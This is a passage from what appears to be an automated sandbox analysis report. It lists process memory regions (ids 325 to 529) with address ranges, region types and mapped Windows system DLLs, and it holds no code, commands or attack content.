0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 325 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 326 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 327 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 328 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 329 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 330 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 331 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 332 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 333 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 334 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 335 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 336 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 337 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 338 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 339 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 340 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 341 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 342 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 343 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 344 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 345 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 346 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 347 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 348 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 349 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 350 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 351 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 352 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 353 start_va = 0x2d20000 end_va = 0x2d20fff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 354 start_va = 0x2d30000 end_va = 0x2d30fff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 355 start_va = 0x2d30000 end_va = 0x2d30fff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 356 start_va = 0x2d40000 end_va = 0x2d40fff entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 357 start_va = 0x2d50000 end_va = 0x2d50fff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 358 start_va = 0x2d50000 end_va = 0x2d50fff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 359 start_va = 0x2d50000 end_va = 0x2d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 360 start_va = 0x2d90000 end_va = 0x2e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 361 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 362 start_va = 0x7f826000 end_va = 0x7f828fff entry_point = 0x0 region_type = private name = "private_0x000000007f826000" filename = "" Region: id = 363 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 364 start_va = 0x74930000 end_va = 0x74942fff entry_point = 0x74930000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 365 start_va = 0x74910000 end_va = 0x7492afff entry_point = 0x74910000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 366 start_va = 0x74640000 end_va = 0x74900fff entry_point = 0x74640000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 367 start_va = 0x74610000 end_va = 0x7463efff entry_point = 0x74610000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 368 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 369 start_va = 0x2eb0000 end_va = 0x2f98fff entry_point = 0x2eb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 370 start_va = 0x2eb0000 end_va = 0x2eb0fff entry_point = 0x2eb0000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 371 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 372 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 373 start_va = 0x745f0000 end_va = 0x74600fff entry_point = 0x745f0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 374 start_va = 0x745c0000 end_va = 0x745effff entry_point = 0x745c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 375 start_va = 0x745b0000 end_va = 0x745b7fff entry_point = 0x745b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 376 start_va = 0x2ec0000 end_va = 0x3034fff entry_point = 0x2ec0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 377 start_va = 0x3040000 end_va = 0x3049fff entry_point = 0x3040000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 378 start_va = 0x74500000 end_va = 0x745a6fff entry_point = 0x74500000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 379 start_va = 0x3050000 end_va = 0x308ffff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 380 start_va = 0x3090000 end_va = 0x318ffff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 381 start_va = 0x7f6fd000 end_va = 0x7f6fffff entry_point = 0x0 region_type = private name = "private_0x000000007f6fd000" filename = "" Region: id = 382 start_va = 0x2ec0000 end_va = 0x2ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 383 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 384 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 385 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 386 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 387 start_va = 0x2ee0000 end_va = 0x2ee1fff entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 388 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 389 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 390 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 391 start_va = 0x2f00000 end_va = 0x2f11fff entry_point = 0x2f00000 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 392 start_va = 0x744b0000 end_va = 0x744fdfff entry_point = 0x744b0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 393 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 394 start_va = 0x2f20000 end_va = 0x2f20fff entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 395 start_va = 0x2f20000 end_va = 0x2f21fff entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 396 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 397 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 398 start_va = 0x2f30000 end_va = 0x2f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 399 start_va = 0x3190000 end_va = 0x328ffff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 400 start_va = 0x7f6fa000 end_va = 0x7f6fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f6fa000" filename = "" Region: id = 401 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 402 start_va = 0x2f70000 end_va = 0x2f70fff entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 403 start_va = 0x2f80000 end_va = 0x2fbffff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 404 start_va = 0x2fc0000 end_va = 0x2ffffff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 405 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 406 start_va = 0x3290000 end_va = 0x338ffff entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 407 start_va = 0x3390000 end_va = 0x348ffff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 408 start_va = 0x7f6f4000 end_va = 0x7f6f6fff entry_point = 0x0 region_type = private name = "private_0x000000007f6f4000" filename = "" Region: id = 409 start_va = 0x7f6f7000 end_va = 0x7f6f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f6f7000" filename = "" Region: id = 410 start_va = 0x3010000 end_va = 0x3011fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 411 start_va = 0x3020000 end_va = 0x3020fff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 412 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 413 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 414 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 415 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 416 start_va = 0x3490000 end_va = 0x34cffff entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 417 start_va = 0x34d0000 end_va = 0x35cffff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 418 start_va = 0x35d0000 end_va = 0x35d0fff entry_point = 0x35d0000 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 419 start_va = 0x7f6f1000 end_va = 0x7f6f3fff entry_point = 0x0 region_type = private name = "private_0x000000007f6f1000" filename = "" Region: id = 420 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 421 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 422 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 423 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 424 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 425 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 426 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 427 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 428 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 429 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 430 start_va = 0x74420000 end_va = 0x744a3fff entry_point = 0x74420000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 431 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 432 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 433 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 434 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 435 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 436 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 437 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 438 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 439 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 440 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 441 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 442 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 443 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 444 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 445 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 446 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 447 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 448 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 449 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 450 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 451 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 452 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 453 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 454 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 455 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 456 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 457 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 458 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 459 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 460 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 461 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 462 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 463 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 464 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 465 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 466 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 467 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 468 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 469 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 470 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 471 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 472 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 473 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 474 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 475 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 476 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 477 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 478 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 479 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 480 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 481 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 482 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 483 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 484 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 485 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 486 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 487 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 488 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 489 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 490 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 491 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 492 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 493 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 494 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 495 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 496 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 497 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 498 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 499 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 500 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 501 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 502 start_va = 0x74410000 end_va = 0x74418fff entry_point = 0x74410000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 503 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 504 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 505 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 506 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 507 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 508 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 509 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 510 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 511 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 512 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 513 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 514 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 515 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 516 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 517 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 518 start_va = 0x743c0000 end_va = 0x74403fff entry_point = 0x743c0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 519 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 520 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 521 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 522 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 523 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 524 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 525 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 526 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 527 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 528 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 529 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = 